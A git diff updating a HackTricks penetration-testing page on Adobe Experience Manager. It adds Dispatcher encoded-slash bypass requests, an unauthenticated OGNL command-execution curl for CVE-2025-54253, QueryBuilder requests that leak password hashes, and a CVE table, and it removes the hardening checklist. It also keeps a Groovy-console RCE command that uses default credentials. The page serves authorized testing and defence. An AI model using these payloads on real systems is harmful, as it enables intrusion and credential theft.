Merge pull request #1840 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_aem-adobe-experience-cloud_20260131_130032

carlospolop · web-flow · commit e030b9ef67d5 · 2026-01-31T14:21:05.000+01:00
Research Update Enhanced src/network-services-pentesting/pen...
diff --git a/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md b/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md
@@ -5,7 +5,7 @@
 > Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).  
 > From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.
 
-The checklist below focuses on **externally reachable (unauth) attack surface** that keeps showing up in real engagements (2022-2025).
+The checklist below focuses on **externally reachable (unauth) attack surface** that keeps showing up in real engagements (2022-2026).
 
 ---
 
@@ -36,40 +36,51 @@ Path | What you get | Notes
 `/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution.
 `/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure.
 `/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector.
+`/adminui/debug` | **AEM Forms on JEE** Struts dev-mode OGNL evaluator | On misconfigured Forms installs (CVE-2025-54253) this endpoint executes unauthenticated OGNL → RCE.
 
-### Dispatcher bypass trick
-Most production sites sit behind the *Dispatcher* (reverse-proxy). Its filter rules can be bypassed by appending an allowed static extension **after a semicolon or encoded newline**:
+### Dispatcher bypass tricks (still working in 2025/2026)
+Most production sites sit behind the *Dispatcher* (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.
 
+*Classic semicolon + allowed extension*
 ```
 GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
 ```
-A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. 【】
+
+*Encoded slash bypass (2025 KB ka-27832)*
+```
+GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
+```
+If the Dispatcher allows encoded slashes, this returns JSON even when `/bin` is supposedly denied.
 
 ---
 
-## 3. Common misconfigurations (still alive in 2025)
+## 3. Common misconfigurations (still alive in 2026)
 
-1. **Anonymous POST servlet** – `POST /.json` with `:operation=import` lets you plant new JCR nodes.  Blocking `*.json` POST in the Dispatcher fixes it. 【】
+1. **Anonymous POST servlet** – `POST /.json` with `:operation=import` lets you plant new JCR nodes. Blocking `*.json` POST in the Dispatcher fixes it.
 2. **World-readable user profiles** – default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
 3. **Default credentials** – `admin:admin`, `author:author`, `replication:replication`.
 4. **WCMDebugFilter** enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
 5. **Groovy Console exposed** – remote code execution by sending a Groovy script:
    ```bash
    curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
    ```
+6. **Dispatcher encoded-slash gap** – `/bin/querybuilder.json` and `/etc/truststore.json` reachable with `%2f`/`%3B` even when blocked by path filters.
+7. **AEM Forms Struts devMode left enabled** – `/adminui/debug?expression=` evaluates OGNL without auth (CVE-2025-54253) leading to unauth RCE; paired XXE in Forms submission (CVE-2025-54254) allows file read.
 
 ---
 
 ## 4. Recent vulnerabilities (service-pack cadence)
 
-Quarter | CVE | Affected | Impact
+Quarter | CVE / Bulletin | Affected | Impact
 ------- | --- | -------- | ------
-Dec 2024 | **CVE-2024-43711** | 6.5.21 and earlier | Improper input validation → **Arbitrary code execution** (requires low-priv auth). 【】
-Dec 2024 | CVE-2024-43724/26 | 6.5.21 and earlier | DOM / Stored XSS in Move Page Wizard. 【】
-Dec 2023 | CVE-2023-48452/68 | ≤ 6.5.18 | DOM-based XSS via crafted URL. 【】
-Dec 2022 | CVE-2022-30683 | ≤ 6.5.13 | Crypto design flaw → secret decryption (needs low-priv creds). 【】
+Dec 2025 | **APSB25-115**, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution via author UI.
+Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) – upgrade to 6.5.24/Cloud 2025.12.
+Aug 2025 | **CVE-2025-54253 / 54254** (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated.
+Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components.
+Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv).
+Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via crafted URL.
 
-Always check the *APSB* bulletin matching the customer’s service-pack and request the latest **6.5.22** or *Cloud Service 2024.11*.
+Always check the *APSB* bulletin matching the customer’s service-pack and push for the latest **6.5.24 (Nov 26, 2025)** or **Cloud Service 2025.12**. AEM Forms on JEE requires its own add-on hotfix **6.5.0-0108+**.
 
 ---
 
@@ -90,7 +101,20 @@ Now request `/content/evil.jsp` – the JSP runs with the AEM process user.
 
 ### 5.2 SSRF to RCE (historical < 6.3)
 `/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console`  
-`aem_ssrf2rce.py` from **aem-hacker** automates the full chain. 【】
+`aem_ssrf2rce.py` from **aem-hacker** automates the full chain.
+
+### 5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
+```
+# Unauth devMode OGNL to run whoami
+curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
+```
+If vulnerable, the HTTP body contains the command output.
+
+### 5.4 QueryBuilder hash disclosure (encoded slash bypass)
+```
+GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
+```
+Returns user nodes including `rep:password` hashes when anonymous read ACLs are default.
 
 ---
 
@@ -99,24 +123,14 @@ Now request `/content/evil.jsp` – the JSP runs with the AEM process user.
 * **aem-hacker** – Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.  
   ```bash
   python3 aem_hacker.py -u https://target --host attacker-ip
-  ```【】
-* **Content Brute-force** – recursively request `/_jcr_content.(json|html)` to discover hidden components.
+  ```
+* **Tenable WAS plugin 115065** – Detects QueryBuilder hash disclosure & encoded-slash bypass automatically (published Dec 2025).
+* **Content brute-force** – recursively request `/_jcr_content.(json|html)` to discover hidden components.
 * **osgi-infect** – upload malicious OSGi bundle via `/system/console/bundles` if creds available.
 
----
-
-## 7. Hardening checklist (for your report’s recommendations)
-
-1. Keep instance on the **latest cumulative service pack** (as of Jul 2025: 6.5.22).  
-2. Remove/rotate default accounts; enforce SSO/SAML.
-3. Tighten **Dispatcher filters** – deny `;`, encoded newlines, and `*.json` or `*.querybuilder.json` for anonymous users.
-4. Disable or protect consoles (`/system/console`, `/crx/*`, `/etc/groovyconsole`) with IP allow-lists.
-5. Apply the *Anonymous Permission Hardening* package shipped by Adobe.
-
-
 
 ## References
 
-* Adobe Security Bulletin APSB24-69 – “Security updates for Adobe Experience Manager (Dec 2024)”.
-* 0ang3el – aem-hacker tool (GitHub).
+* [Adobe Security Bulletin APSB25-115 – Security updates for Adobe Experience Manager (Dec 9, 2025)](https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html)
+* [BleepingComputer – Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)](https://www.bleepingcomputer.com/news/security/adobe-issues-emergency-fixes-for-aem-forms-zero-days-after-pocs-released/)
 {{#include ../../banners/hacktricks-training.md}}
